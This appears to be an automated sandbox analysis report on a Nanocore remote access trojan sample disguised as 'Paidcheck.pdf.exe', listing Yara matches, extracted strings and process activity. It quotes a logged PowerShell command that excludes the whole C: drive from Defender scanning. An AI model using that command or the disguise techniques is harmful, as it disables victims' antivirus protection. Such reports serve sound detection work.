      Source: Paidcheck.pdf.exe, 00000000.00000002.306467262.0000000002F7B000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
      Source: Paidcheck.pdf.exe, 00000000.00000002.318100839.0000000006BB2000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
      Source: Paidcheck.pdf.exe, 00000000.00000002.318100839.0000000006BB2000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
      Source: Paidcheck.pdf.exe, 00000000.00000002.318100839.0000000006BB2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
      Source: Paidcheck.pdf.exe, 00000000.00000002.318100839.0000000006BB2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
      Source: Paidcheck.pdf.exe, 00000000.00000002.318100839.0000000006BB2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
      Source: Paidcheck.pdf.exe, 00000000.00000002.318100839.0000000006BB2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
      Source: Paidcheck.pdf.exe, 00000000.00000002.318100839.0000000006BB2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
      Source: Paidcheck.pdf.exe, 00000000.00000002.318100839.0000000006BB2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
      Source: Paidcheck.pdf.exe, 00000000.00000002.318100839.0000000006BB2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
      Source: Paidcheck.pdf.exe, 00000000.00000002.318100839.0000000006BB2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
      Source: Paidcheck.pdf.exe, 00000000.00000002.318100839.0000000006BB2000.00000004.00000001.sdmpString found in binary or memory: http://www.fonts.com
      Source: Paidcheck.pdf.exe, 00000000.00000002.318100839.0000000006BB2000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
      Source: Paidcheck.pdf.exe, 00000000.00000002.318100839.0000000006BB2000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
      Source: Paidcheck.pdf.exe, 00000000.00000002.318100839.0000000006BB2000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
      Source: Paidcheck.pdf.exe, 00000000.00000002.318100839.0000000006BB2000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
      Source: Paidcheck.pdf.exe, 00000000.00000002.318100839.0000000006BB2000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
      Source: Paidcheck.pdf.exe, 00000000.00000002.318100839.0000000006BB2000.00000004.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
      Source: Paidcheck.pdf.exe, 00000000.00000002.318100839.0000000006BB2000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
      Source: Paidcheck.pdf.exe, 00000000.00000002.318100839.0000000006BB2000.00000004.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
      Source: Paidcheck.pdf.exe, 00000000.00000002.318100839.0000000006BB2000.00000004.00000001.sdmpString found in binary or memory: http://www.sakkal.com
      Source: Paidcheck.pdf.exe, 00000000.00000002.318100839.0000000006BB2000.00000004.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
      Source: Paidcheck.pdf.exe, 00000000.00000002.318100839.0000000006BB2000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.com
      Source: Paidcheck.pdf.exe, 00000000.00000002.318100839.0000000006BB2000.00000004.00000001.sdmpString found in binary or memory: http://www.typography.netD
      Source: Paidcheck.pdf.exe, 00000000.00000002.318100839.0000000006BB2000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
      Source: Paidcheck.pdf.exe, 00000000.00000002.318100839.0000000006BB2000.00000004.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
      Source: powershell.exe, 0000000B.00000003.373704213.00000000055FF000.00000004.00000001.sdmpString found in binary or memory: https://go.micro
      Source: Paidcheck.pdf.exe, 00000000.00000002.305273244.0000000000E70000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
      Source: RegAsm.exe, 0000000A.00000002.486028172.0000000003C21000.00000004.00000001.sdmpBinary or memory string: RegisterRawInputDevices

      E-Banking Fraud:

      barindex
      Yara detected Nanocore RATShow sources
      Source: Yara matchFile source: 10.2.RegAsm.exe.5f60000.23.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 10.2.RegAsm.exe.3c3dc19.10.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 10.2.RegAsm.exe.3c395f0.11.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 0.2.Paidcheck.pdf.exe.3c69950.3.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 10.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 10.2.RegAsm.exe.5f64629.22.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 10.2.RegAsm.exe.5f60000.23.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 10.2.RegAsm.exe.3c395f0.11.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 10.2.RegAsm.exe.3c24c35.9.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 0.2.Paidcheck.pdf.exe.3c91970.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 0.2.Paidcheck.pdf.exe.3ce1990.6.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 0.2.Paidcheck.pdf.exe.3c69950.3.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 0.2.Paidcheck.pdf.exe.3c91970.2.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 0.2.Paidcheck.pdf.exe.3eceb18.5.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 10.2.RegAsm.exe.3d596b5.14.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 10.2.RegAsm.exe.3d4d481.12.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 0.2.Paidcheck.pdf.exe.3e36bd0.4.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 10.2.RegAsm.exe.3d6dce2.13.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 0.2.Paidcheck.pdf.exe.3ce1990.6.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 0000000A.00000002.486028172.0000000003C21000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000A.00000002.480862241.0000000002BD1000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000002.306569073.0000000003C69000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000A.00000002.475784667.0000000000402000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000A.00000002.488145685.0000000005F60000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000A.00000002.486159057.0000000003C9E000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000002.306631501.0000000003CE1000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: Paidcheck.pdf.exe PID: 4608, type: MEMORY

      System Summary:

      barindex
      Malicious sample detected (through community Yara rule)Show sources
      Source: 10.2.RegAsm.exe.6aa0000.26.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.RegAsm.exe.6af0000.31.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.RegAsm.exe.6540000.24.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.RegAsm.exe.6b20000.33.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.RegAsm.exe.6540000.24.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.RegAsm.exe.5f60000.23.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.RegAsm.exe.3c3dc19.10.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.RegAsm.exe.6b3e8a4.34.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.RegAsm.exe.6a60000.25.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.RegAsm.exe.3c395f0.11.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.RegAsm.exe.3bd9930.6.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.RegAsm.exe.6ac0000.28.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.RegAsm.exe.3d4d481.12.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 0.2.Paidcheck.pdf.exe.3c69950.3.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 0.2.Paidcheck.pdf.exe.3c69950.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 10.2.RegAsm.exe.6af0000.31.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.RegAsm.exe.3f1807f.17.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.RegAsm.exe.3f1807f.17.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 10.2.RegAsm.exe.2c6410c.3.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.RegAsm.exe.6ae0000.30.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.RegAsm.exe.3bd9930.6.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.RegAsm.exe.3d596b5.14.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.RegAsm.exe.6b30000.36.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.RegAsm.exe.3f20eae.16.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.RegAsm.exe.6b00000.32.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.RegAsm.exe.6b34c9f.35.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.RegAsm.exe.6a60000.25.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.RegAsm.exe.6b00000.32.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.RegAsm.exe.3f2f2de.15.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.RegAsm.exe.6ab0000.27.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.RegAsm.exe.5cf0000.20.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.RegAsm.exe.3f20eae.16.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.RegAsm.exe.6ab0000.27.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 10.2.RegAsm.exe.3f1807f.17.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 0.2.Paidcheck.pdf.exe.2fc8f5c.1.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 0.2.Paidcheck.pdf.exe.2fc8f5c.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 10.2.RegAsm.exe.6ac0000.28.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.RegAsm.exe.5f64629.22.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.RegAsm.exe.5f60000.23.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.RegAsm.exe.6b20000.33.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.RegAsm.exe.6ad0000.29.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.RegAsm.exe.3bde5cf.8.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.RegAsm.exe.3f2f2de.15.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.RegAsm.exe.2c06b78.2.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.RegAsm.exe.2c57ec4.5.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 0.2.Paidcheck.pdf.exe.2fc8f5c.1.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 0.2.Paidcheck.pdf.exe.2fc8f5c.1.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 10.2.RegAsm.exe.3c395f0.11.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.RegAsm.exe.6b70000.37.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.RegAsm.exe.3c24c35.9.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 0.2.Paidcheck.pdf.exe.3c91970.2.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 0.2.Paidcheck.pdf.exe.3c91970.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 0.2.Paidcheck.pdf.exe.3ce1990.6.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 0.2.Paidcheck.pdf.exe.3ce1990.6.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 0.2.Paidcheck.pdf.exe.3c69950.3.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 0.2.Paidcheck.pdf.exe.3c69950.3.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 10.2.RegAsm.exe.6ae0000.30.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.RegAsm.exe.3be81d4.7.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.RegAsm.exe.6b30000.36.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.RegAsm.exe.6b70000.37.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 0.2.Paidcheck.pdf.exe.3c91970.2.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 0.2.Paidcheck.pdf.exe.3c91970.2.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 0.2.Paidcheck.pdf.exe.3eceb18.5.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 0.2.Paidcheck.pdf.exe.3eceb18.5.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 10.2.RegAsm.exe.2c6410c.3.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.RegAsm.exe.2c6410c.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 10.2.RegAsm.exe.3d596b5.14.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 10.2.RegAsm.exe.2c78748.4.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.RegAsm.exe.2c78748.4.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 10.2.RegAsm.exe.2c57ec4.5.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.RegAsm.exe.2c57ec4.5.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 0.2.Paidcheck.pdf.exe.3e36bd0.4.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 10.2.RegAsm.exe.3d4d481.12.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 0.2.Paidcheck.pdf.exe.3e36bd0.4.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 10.2.RegAsm.exe.3d6dce2.13.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 0.2.Paidcheck.pdf.exe.3ce1990.6.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 0.2.Paidcheck.pdf.exe.3ce1990.6.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 0000000A.00000002.489583324.0000000006AE0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 0000000A.00000002.489612567.0000000006AF0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 0000000A.00000002.489824086.0000000006B70000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 0000000A.00000002.489650753.0000000006B00000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 00000000.00000002.306467262.0000000002F7B000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 00000000.00000002.306467262.0000000002F7B000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000000.00000002.306569073.0000000003C69000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 00000000.00000002.306569073.0000000003C69000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 0000000A.00000002.489080890.0000000006540000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 0000000A.00000002.481024658.0000000002C47000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 0000000A.00000002.489200537.0000000006A60000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 0000000A.00000002.475784667.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 0000000A.00000002.475784667.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 0000000A.00000002.489750000.0000000006B30000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 0000000A.00000002.489515474.0000000006AC0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 0000000A.00000002.489556083.0000000006AD0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 0000000A.00000002.489421921.0000000006AB0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 0000000A.00000002.487959642.0000000005CF0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 0000000A.00000002.489379501.0000000006AA0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 0000000A.00000002.489724934.0000000006B20000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 0000000A.00000002.488145685.0000000005F60000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 0000000A.00000002.486430040.0000000003EBC000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 0000000A.00000002.486159057.0000000003C9E000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 00000000.00000002.306631501.0000000003CE1000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 00000000.00000002.306631501.0000000003CE1000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: Process Memory Space: Paidcheck.pdf.exe PID: 4608, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: Process Memory Space: Paidcheck.pdf.exe PID: 4608, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Initial sample is a PE file and has a suspicious nameShow sources
      Source: initial sampleStatic PE information: Filename: Paidcheck.pdf.exe
      Wscript starts Powershell (via cmd or directly)Show sources
      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Set-MpPreference -ExclusionPath C:\,'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dwrn\explorerr.exe'
      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Set-MpPreference -ExclusionPath C:\,'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dwrn\explorerr.exe'Jump to behavior
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeCode function: 0_2_006A29C00_2_006A29C0
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeCode function: 0_2_00E5C2040_2_00E5C204
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeCode function: 0_2_00E5E5C00_2_00E5E5C0
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeCode function: 0_2_00E5E5D00_2_00E5E5D0
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeCode function: 0_2_06FF963C0_2_06FF963C
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeCode function: 0_2_06FF00FB0_2_06FF00FB
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeCode function: 0_2_06FF012D0_2_06FF012D
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeCode function: 0_2_0733FC480_2_0733FC48
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeCode function: 0_2_07B281800_2_07B28180
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeCode function: 0_2_006A20500_2_006A2050
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 10_2_00763DFE10_2_00763DFE
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 10_2_065402B010_2_065402B0
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 10_2_029BE48010_2_029BE480
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 10_2_029BE47110_2_029BE471
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 10_2_029BBBD410_2_029BBBD4
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 10_2_0509655010_2_05096550
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 10_2_0509CFB010_2_0509CFB0
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 10_2_05093E3010_2_05093E30
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 10_2_0509C39810_2_0509C398
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 10_2_05094A5010_2_05094A50
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 10_2_0509D06E10_2_0509D06E
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 10_2_05094B0810_2_05094B08
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 10_2_0509BA2710_2_0509BA27
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 10_2_0509D2E810_2_0509D2E8
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 10_2_06CC9C9010_2_06CC9C90
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 10_2_06CCA5F010_2_06CCA5F0
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 10_2_06CC2D1010_2_06CC2D10
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 10_2_06CC181810_2_06CC1818
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 10_2_06CC276E10_2_06CC276E
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 10_2_06CC24EE10_2_06CC24EE
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 10_2_06CC243010_2_06CC2430
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 10_2_06CCE27A10_2_06CCE27A
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 10_2_06CC991010_2_06CC9910
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 10_2_06CC492110_2_06CC4921
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 10_2_070507D810_2_070507D8
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 17_2_00CA3DFE17_2_00CA3DFE
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 19_2_002A3DFE19_2_002A3DFE
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 21_2_008A3DFE21_2_008A3DFE
      Source: Paidcheck.pdf.exe, 00000000.00000002.305273244.0000000000E70000.00000004.00000020.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Paidcheck.pdf.exe
      Source: Paidcheck.pdf.exe, 00000000.00000003.303465052.0000000003FEB000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameQjisrzmpsmlj.dll" vs Paidcheck.pdf.exe
      Source: Paidcheck.pdf.exe, 00000000.00000003.303229105.000000000739C000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameConsoleApp18709999999999999999.exeN vs Paidcheck.pdf.exe
      Source: Paidcheck.pdf.exe, 00000000.00000002.319081294.00000000072F0000.00000002.00000001.sdmpBinary or memory string: originalfilename vs Paidcheck.pdf.exe
      Source: Paidcheck.pdf.exe, 00000000.00000002.319081294.00000000072F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamepropsys.dll.mui@ vs Paidcheck.pdf.exe
      Source: Paidcheck.pdf.exe, 00000000.00000002.318898900.0000000007290000.00000002.00000001.sdmpBinary or memory string: System.OriginalFileName vs Paidcheck.pdf.exe
      Source: Paidcheck.pdf.exe, 00000000.00000002.305879453.0000000002C21000.00000004.00000001.sdmpBinary or memory string: OriginalFilename vs Paidcheck.pdf.exe
